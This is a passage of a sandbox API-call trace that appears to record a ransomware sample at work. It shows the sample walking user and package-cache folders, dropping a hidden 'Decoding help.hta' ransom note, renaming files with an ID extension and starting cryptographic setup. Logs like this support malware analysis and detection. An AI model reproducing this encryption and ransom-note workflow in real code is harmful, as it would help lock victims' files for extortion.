ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.499] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.499] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.499] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 1 [0054.499] lstrcmpW (lpString1=".", lpString2="User Data") returned -1 [0054.499] lstrcmpW (lpString1="..", lpString2="User Data") returned -1 [0054.499] lstrcmpiW (lpString1="windows", lpString2="User Data") returned 1 [0054.499] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*" [0054.499] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*") returned 65 [0054.499] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\", lpString2="User Data" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0054.499] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0054.499] GlobalMemoryStatus (in: lpBuffer=0x92cfd10 | out: lpBuffer=0x92cfd10) [0054.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d6e980, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7e0 [0054.501] CloseHandle (hObject=0x7e0) returned 1 [0054.502] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 0 [0054.502] FindClose (in: hFindFile=0x671af0 | out: hFindFile=0x671af0) returned 1 Thread: id = 768 os_tid = 0x7d4 [0054.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6711f0 [0054.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.501] FindNextFileW (in: hFindFile=0x6711f0, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.501] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.501] FindNextFileW (in: hFindFile=0x6711f0, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.501] lstrcpyW (in: lpString1=0x972a1d8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0054.501] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned 120 [0054.501] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" [0054.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\decoding help.hta")) returned 0xffffffff [0054.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0056.127] WriteFile (in: hFile=0x2b0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x15fdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x15fdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.477] CloseHandle (hObject=0x2b0) returned 1 [0057.477] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.477] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0057.477] lstrlenW (lpString="cab1.cab") returned 8 [0057.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0057.477] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned 120 [0057.477] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0057.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0057.477] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0057.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.478] FindNextFileW (in: hFindFile=0x6711f0, lpFindFileData=0x15fdfd30 | out: lpFindFileData=0x15fdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0057.478] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0057.478] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned 120 [0057.478] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" [0057.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\decoding help.hta")) returned 0x1 [0057.478] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeMinimum_x86.msi") returned -1 [0057.478] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0057.478] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0057.478] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned 120 [0057.478] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" [0057.478] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" [0057.478] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0057.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdd0 [0060.884] CreateFileMappingA (hFile=0xdd0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xdc8 [0060.884] CryptAcquireContextA (phProv=0x15fdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 769 os_tid = 0xb0 [0054.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*.*", lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671af0 [0054.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.503] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.503] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.503] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.503] FindClose (in: hFindFile=0x671af0 | out: hFindFile=0x671af0) returned 1 Thread: id = 770 os_tid = 0x7ec [0054.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x161dfd30 | out: lpFindFileData=0x161dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x26e53090, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26e53090, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671af0 [0054.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.504] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x161dfd30 | out: lpFindFileData=0x161dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x26e53090, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26e53090, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.504] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.504] FindNextFileW (in: hFindFile=0x671af0, lpFindFileData=0x161dfd30 | out: lpFindFileData=0x161dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa87bcb00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0xa87bcb00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0xa87bcb00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x588124, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.504] lstrcpyW (in: lpString1=0x97923d0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0054.504] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 125 [0054.504] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0054.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0x1 [0056.755] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0056.755] lstrlenW (lpString="cab1.cab") returned 8 [0056.755] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0056.755] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 125 [0056.755] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0056.755] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package 